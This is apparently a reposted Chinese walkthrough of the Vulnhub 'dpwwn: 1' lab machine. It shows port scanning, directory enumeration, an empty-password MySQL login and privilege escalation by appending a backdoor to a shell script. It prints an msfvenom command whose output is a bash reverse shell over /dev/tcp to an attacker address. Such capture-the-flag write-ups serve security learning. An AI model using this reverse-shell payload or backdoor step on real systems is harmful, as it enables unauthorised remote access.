dpwwn: 1 Vulnhub Walkthrough - APT-101 - 技术经验 - W3xue

技术经验

手册 / 书籍

经验首页前端设计程序设计 Java相关移动开发数据库/运维软件/图像大数据/云计算其他经验

当前位置：技术经验 » 其他 » 网络安全 » 查看文章

dpwwn: 1 Vulnhub Walkthrough - APT-101

来源：cnblogs　　作者：APT-101　　时间：2019/8/20 8:51:42　　对本文有异议

主机层面扫描：

╰─ nmap -p1-65535 -sV -A 10.10.202.130

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)

3306/tcp open mysql MySQL 5.5.60-MariaDB

web目录枚举

╰─ dirb http://10.10.202.130/

---- Scanning URL: http://10.10.202.130/ ----
+ http://10.10.202.130/cgi-bin/ (CODE:403|SIZE:210)
+ http://10.10.202.130/info.php (CODE:200|SIZE:47537)

暂时么有可用信息

尝试登录MySQL，空密码登录成功

SSH 登录尝试提权

追加后门脚本到此shell脚本中去，即可

╰─ msfvenom -p cmd/unix/reverse_bash lhost=10.10.202.145 lport=1234 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 67 bytes
0<&175-;exec 175<>/dev/tcp/10.10.202.145/1234;sh <&175 >&175 2>&175

完！

原文链接：http://www.cnblogs.com/hack404/p/11377926.html

友情链接：直通硅谷　点职佳　北美留学生论坛

网络安全热门文章

AI: Web: 2 Vulnhub Walkthrough - APT-101

各类黑客大马默认密码后门

蓝凌OA前台任意文件读取漏洞利用

银河麒麟SP2 auditd服务内存泄露问题

confluence 挖矿木马应急响应 - APT-101

信息安全题目整理（1）

时间同步（NTP/PTP）技术原理介绍

apache log4j2 漏洞复现linux【纯详版】

Kali proxychains

使用tor实现对网络的匿名访问

网络安全推荐文章

异构数据源数据同步 → 从源码分析 DataX 敏感信息的加解密

FFmpeg开发笔记（三十八）APP如何访问SRS推流的RTMP直播地址

劫持TLS绕过canary && 堆和栈的灵活转换

第二届黄河流域网络安全技能挑战赛Web_wirteup

深入理解高级加密标准（Advanced Encryption Standard）

渗透测试-信息收集

RC4Drop加密技术：原理、实践与安全性探究

知名压缩软件 xz 被植入后门，黑客究竟是如何做到的？

《熬夜整理》保姆级系列教程-玩转Wireshark抓包神器教程(1)-初识Wireshark - 北京-宏哥

本站QQ群：前端 618073944 | Java 606181507 | Python 626812652 | C/C++ 612253063 | 微信 634508462 | 苹果 692586424 | C#/.net 182808419 | PHP 305140648 | 运维 608723728

W3xue 的所有内容仅供测试，对任何法律问题及风险不承担任何责任。通过使用本站内容随之而来的风险与本站无关。
关于我们 | 意见建议 | 捐助我们 | 报错有奖 | 广告合作、友情链接（目前9元/月）请联系QQ：27243702 沸活量
皖ICP备17017327号-2　

皖公网安备34020702000426号